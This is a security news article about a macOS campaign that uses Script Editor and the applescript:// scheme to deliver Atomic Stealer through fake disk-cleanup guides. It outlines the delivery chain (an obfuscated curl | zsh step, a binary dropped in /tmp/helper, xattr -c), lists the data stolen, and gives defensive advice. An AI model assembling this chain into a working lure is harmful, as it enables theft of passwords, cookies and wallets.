A new macOS malware campaign abuses Script Editor to deliver Atomic Stealer without requiring Terminal interaction, bypassing recent security protections.
A new macOS malware campaign is exploiting the Script Editor application to deliver the Atomic Stealer (AMOS) malware through a variation of the ClickFix social engineering attack. This technique allows attackers to bypass recent macOS security protections that were specifically designed to block ClickFix attacks in Terminal.
How the attack works
The campaign, discovered by security researchers at Jamf, targets macOS users through fake Apple-themed websites that pose as legitimate guides for reclaiming disk space on Mac computers. These malicious pages contain convincing system cleanup instructions but hide a dangerous payload.
When victims visit these sites, the attackers use the applescript:// URL scheme to automatically launch the Script Editor application with pre-filled executable code. This approach is particularly insidious because Script Editor is a trusted, built-in macOS application for writing and running scripts, primarily AppleScript and JXA.
Unlike traditional ClickFix attacks that require victims to manually copy and paste commands into Terminal, this variant eliminates that step entirely. The malicious code embedded in Script Editor runs an obfuscated curl | zsh command that downloads and executes a script directly in system memory.
The malware delivery chain
The attack follows a sophisticated multi-stage delivery process:
- The obfuscated command decodes a base64 + gzip payload
- It downloads a binary to
/tmp/helper - Security attributes are removed using
xattr -c - The binary is made executable
- The final payload runs as a Mach-O binary
The final payload is identified as Atomic Stealer (AMOS), a commodity malware-as-a-service that has been extensively deployed in ClickFix campaigns using various lures over the past year.
What Atomic Stealer targets
Once installed, AMOS is designed to harvest a broad spectrum of sensitive data from compromised systems:
- Keychain passwords and certificates
- Desktop files and documents
- Browser cryptocurrency wallet extensions
- Browser autofill data, passwords, and cookies
- Stored credit card information
- System information and hardware details
Last year, AMOS added a backdoor component that gives attackers persistent access to compromised systems, making it even more dangerous than typical information stealers.
Bypassing macOS security measures
This campaign demonstrates how attackers continue to evolve their techniques to bypass security protections. In macOS Tahoe 26.4, Apple added warnings when users attempt to execute commands in Terminal as part of ClickFix attack prevention.
By shifting the attack vector from Terminal to Script Editor, the attackers circumvent these protections while maintaining the same social engineering premise. The use of a trusted system application makes the attack more convincing and reduces the likelihood of user suspicion.
Protection recommendations
Mac users should treat Script Editor prompts as high-risk and avoid running them on their devices unless they fully understand what they do and trust the source. The legitimate use cases for Script Editor are relatively limited for average users, making unexpected prompts a significant red flag.
For macOS troubleshooting and system maintenance, it is recommended to rely only on official documentation from Apple. While Apple Support Communities can be a helpful resource where Apple customers help each other with advice, it may not be entirely risk-free and requires careful verification of any suggested commands or scripts.
This campaign highlights the ongoing evolution of macOS malware delivery techniques and the importance of user vigilance when encountering unexpected application prompts, even from seemingly legitimate sources.
Comments
Please log in or register to join the discussion